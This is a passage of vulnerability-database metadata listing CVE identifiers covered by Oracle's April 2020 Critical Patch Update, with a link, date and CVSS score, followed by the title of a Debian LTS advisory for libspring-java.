"CVE-2017-12626", "CVE-2017-13745", "CVE-2017-14232", "CVE-2017-14735", "CVE-2017-15706", "CVE-2017-3160", "CVE-2017-5130", "CVE-2017-5529", "CVE-2017-5533", "CVE-2017-5645", "CVE-2017-5754", "CVE-2017-7857", "CVE-2017-7858", "CVE-2017-7864", "CVE-2017-8105", "CVE-2017-8287", "CVE-2018-0732", "CVE-2018-0734", "CVE-2018-0737", "CVE-2018-1000180", "CVE-2018-1000613", "CVE-2018-1000632", "CVE-2018-1000873", "CVE-2018-10237", "CVE-2018-11054", "CVE-2018-11055", "CVE-2018-11056", "CVE-2018-11057", "CVE-2018-11058", "CVE-2018-11307", "CVE-2018-1165", "CVE-2018-11775", "CVE-2018-11784", "CVE-2018-11797", "CVE-2018-12022", "CVE-2018-12023", "CVE-2018-1258", "CVE-2018-1304", "CVE-2018-1305", "CVE-2018-1320", "CVE-2018-1336", "CVE-2018-14718", "CVE-2018-14719", "CVE-2018-14720", "CVE-2018-14721", "CVE-2018-15756", "CVE-2018-15769", "CVE-2018-17197", "CVE-2018-18227", "CVE-2018-18311", "CVE-2018-18873", "CVE-2018-19139", "CVE-2018-19360", "CVE-2018-19361", "CVE-2018-19362", "CVE-2018-19539", "CVE-2018-19540", "CVE-2018-19541", "CVE-2018-19542", "CVE-2018-19543", "CVE-2018-19622", "CVE-2018-19623", "CVE-2018-19624", "CVE-2018-19625", "CVE-2018-19626", "CVE-2018-19627", "CVE-2018-19628", "CVE-2018-20346", "CVE-2018-20506", "CVE-2018-20570", "CVE-2018-20584", "CVE-2018-20622", "CVE-2018-20843", "CVE-2018-20852", "CVE-2018-5407", "CVE-2018-5711", "CVE-2018-5712", "CVE-2018-6942", "CVE-2018-8014", "CVE-2018-8032", "CVE-2018-8034", "CVE-2018-8036", "CVE-2018-8037", "CVE-2018-8039", "CVE-2018-9055", "CVE-2018-9154", "CVE-2018-9252", "CVE-2019-0196", "CVE-2019-0197", "CVE-2019-0199", "CVE-2019-0211", "CVE-2019-0215", "CVE-2019-0217", "CVE-2019-0220", "CVE-2019-0221", "CVE-2019-0222", "CVE-2019-0227", "CVE-2019-0228", "CVE-2019-0232", "CVE-2019-10072", "CVE-2019-10081", "CVE-2019-10082", "CVE-2019-10086", "CVE-2019-10088", "CVE-2019-10092", "CVE-2019-10093", "CVE-2019-10094", "CVE-2019-10097", "CVE-2019-10098", "CVE-2019-1010238", "CVE-2019-10173", "CVE-2019-10246", "CVE-2019-10247", "CVE-2019-11358", "CVE-2019-12086", "CVE-2019-12384", "CVE-2019-12387", "CVE-2019-12402", "CVE-2019-12406", "CVE-2019-12415", "CVE-2019-12418", "CVE-2019-12419", "CVE-2019-12855", "CVE-2019-13057", "CVE-2019-13565", "CVE-2019-13990", "CVE-2019-14379", "CVE-2019-14439", "CVE-2019-14540", "CVE-2019-14821", "CVE-2019-14889", "CVE-2019-15161", "CVE-2019-15162", "CVE-2019-15163", "CVE-2019-15164", "CVE-2019-15165", "CVE-2019-1543", "CVE-2019-1547", "CVE-2019-1549", "CVE-2019-1552", "CVE-2019-15601", "CVE-2019-15604", "CVE-2019-15605", "CVE-2019-15606", "CVE-2019-1563", "CVE-2019-15903", "CVE-2019-16056", "CVE-2019-16168", "CVE-2019-16335", "CVE-2019-16942", "CVE-2019-16943", "CVE-2019-17091", "CVE-2019-17195", "CVE-2019-17359", "CVE-2019-17531", "CVE-2019-17563", "CVE-2019-17571", "CVE-2019-18197", "CVE-2019-19242", "CVE-2019-19244", "CVE-2019-19269", "CVE-2019-19317", "CVE-2019-19553", "CVE-2019-19603", "CVE-2019-19645", "CVE-2019-19646", "CVE-2019-19880", "CVE-2019-19923", "CVE-2019-19924", "CVE-2019-19925", "CVE-2019-19926", "CVE-2019-19959", "CVE-2019-20218", "CVE-2019-20330", "CVE-2019-2412", "CVE-2019-2725", "CVE-2019-2729", "CVE-2019-2756", "CVE-2019-2759", "CVE-2019-2852", "CVE-2019-2853", "CVE-2019-2878", "CVE-2019-2880", "CVE-2019-2899", "CVE-2019-2904", "CVE-2019-3008", "CVE-2019-5427", "CVE-2019-5435", "CVE-2019-5436", "CVE-2019-5443", "CVE-2019-5481", "CVE-2019-5482", "CVE-2019-8457", "CVE-2019-9517", "CVE-2019-9579", "CVE-2020-2514", "CVE-2020-2522", "CVE-2020-2524", "CVE-2020-2553", "CVE-2020-2558", "CVE-2020-2575", "CVE-2020-2578", "CVE-2020-2594", "CVE-2020-2680", "CVE-2020-2706", "CVE-2020-2733", "CVE-2020-2734", "CVE-2020-2735", "CVE-2020-2737", "CVE-2020-2738", "CVE-2020-2739", "CVE-2020-2740", "CVE-2020-2741", "CVE-2020-2742", "CVE-2020-2743", "CVE-2020-2744", "CVE-2020-2745", "CVE-2020-2746", "CVE-2020-2747", "CVE-2020-2748", "CVE-2020-2749", "CVE-2020-2750", "CVE-2020-2751", "CVE-2020-2752", "CVE-2020-2753", "CVE-2020-2754", "CVE-2020-2755", "CVE-2020-2756", "CVE-2020-2757", "CVE-2020-2758", "CVE-2020-2759", "CVE-2020-2760", "CVE-2020-2761", "CVE-2020-2762", "CVE-2020-2763", "CVE-2020-2764", "CVE-2020-2765", "CVE-2020-2766", "CVE-2020-2767", "CVE-2020-2768", "CVE-2020-2769", "CVE-2020-2770", "CVE-2020-2771", "CVE-2020-2772", "CVE-2020-2773", "CVE-2020-2774", "CVE-2020-2775", "CVE-2020-2776", "CVE-2020-2777", "CVE-2020-2778", "CVE-2020-2779", "CVE-2020-2780", "CVE-2020-2781", "CVE-2020-2782", "CVE-2020-2783", "CVE-2020-2784", "CVE-2020-2785", "CVE-2020-2786", "CVE-2020-2787", "CVE-2020-2789", "CVE-2020-2790", "CVE-2020-2791", "CVE-2020-2793", "CVE-2020-2794", "CVE-2020-2795", "CVE-2020-2796", "CVE-2020-2797", "CVE-2020-2798", "CVE-2020-2799", "CVE-2020-2800", "CVE-2020-2801", "CVE-2020-2802", "CVE-2020-2803", "CVE-2020-2804", "CVE-2020-2805", "CVE-2020-2806", "CVE-2020-2807", "CVE-2020-2808", "CVE-2020-2809", "CVE-2020-2810", "CVE-2020-2811", "CVE-2020-2812", "CVE-2020-2813", "CVE-2020-2814", "CVE-2020-2815", "CVE-2020-2816", "CVE-2020-2817", "CVE-2020-2818", "CVE-2020-2819", "CVE-2020-2820", "CVE-2020-2821", "CVE-2020-2822", "CVE-2020-2823", "CVE-2020-2824", "CVE-2020-2825", "CVE-2020-2826", "CVE-2020-2827", "CVE-2020-2828", "CVE-2020-2829", "CVE-2020-2830", "CVE-2020-2831", "CVE-2020-2832", "CVE-2020-2833", "CVE-2020-2834", "CVE-2020-2835", "CVE-2020-2836", "CVE-2020-2837", "CVE-2020-2838", "CVE-2020-2839", "CVE-2020-2840", "CVE-2020-2841", "CVE-2020-2842", "CVE-2020-2843", "CVE-2020-2844", "CVE-2020-2845", "CVE-2020-2846", "CVE-2020-2847", "CVE-2020-2848", "CVE-2020-2849", "CVE-2020-2850", "CVE-2020-2851", "CVE-2020-2852", "CVE-2020-2853", "CVE-2020-2854", "CVE-2020-2855", "CVE-2020-2856", "CVE-2020-2857", "CVE-2020-2858", "CVE-2020-2859", "CVE-2020-2860", "CVE-2020-2861", "CVE-2020-2862", "CVE-2020-2863", "CVE-2020-2864", "CVE-2020-2865", "CVE-2020-2866", "CVE-2020-2867", "CVE-2020-2868", "CVE-2020-2869", "CVE-2020-2870", "CVE-2020-2871", "CVE-2020-2872", "CVE-2020-2873", "CVE-2020-2874", "CVE-2020-2875", "CVE-2020-2876", "CVE-2020-2877", "CVE-2020-2878", "CVE-2020-2879", "CVE-2020-2880", "CVE-2020-2881", "CVE-2020-2882", "CVE-2020-2883", "CVE-2020-2884", "CVE-2020-2885", "CVE-2020-2886", "CVE-2020-2887", "CVE-2020-2888", "CVE-2020-2889", "CVE-2020-2890", "CVE-2020-2891", "CVE-2020-2892", "CVE-2020-2893", "CVE-2020-2894", "CVE-2020-2895", "CVE-2020-2896", "CVE-2020-2897", "CVE-2020-2898", "CVE-2020-2899", "CVE-2020-2900", "CVE-2020-2901", "CVE-2020-2902", "CVE-2020-2903", "CVE-2020-2904", "CVE-2020-2905", "CVE-2020-2906", "CVE-2020-2907", "CVE-2020-2908", "CVE-2020-2909", "CVE-2020-2910", "CVE-2020-2911", "CVE-2020-2912", "CVE-2020-2913", "CVE-2020-2914", "CVE-2020-2915", "CVE-2020-2920", "CVE-2020-2921", "CVE-2020-2922", "CVE-2020-2923", "CVE-2020-2924", "CVE-2020-2925", "CVE-2020-2926", "CVE-2020-2927", "CVE-2020-2928", "CVE-2020-2929", "CVE-2020-2930", "CVE-2020-2931", "CVE-2020-2932", "CVE-2020-2933", "CVE-2020-2934", "CVE-2020-2935", "CVE-2020-2936", "CVE-2020-2937", "CVE-2020-2938", "CVE-2020-2939", "CVE-2020-2940", "CVE-2020-2941", "CVE-2020-2942", "CVE-2020-2943", "CVE-2020-2944", "CVE-2020-2945", "CVE-2020-2946", "CVE-2020-2947", "CVE-2020-2949", "CVE-2020-2950", "CVE-2020-2951", "CVE-2020-2952", "CVE-2020-2953", "CVE-2020-2954", "CVE-2020-2955", "CVE-2020-2956", "CVE-2020-2958", "CVE-2020-2959", "CVE-2020-2961", "CVE-2020-2963", "CVE-2020-2964", "CVE-2020-5397", "CVE-2020-5398", "CVE-2020-7044", "CVE-2020-8840"], "modified": "2020-07-20T00:00:00", "id": "ORACLE:CPUAPR2020", "href": "https://www.oracle.com/security-alerts/cpuapr2020.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}
[SECURITY] [DLA 2635-1] libspring-java security update
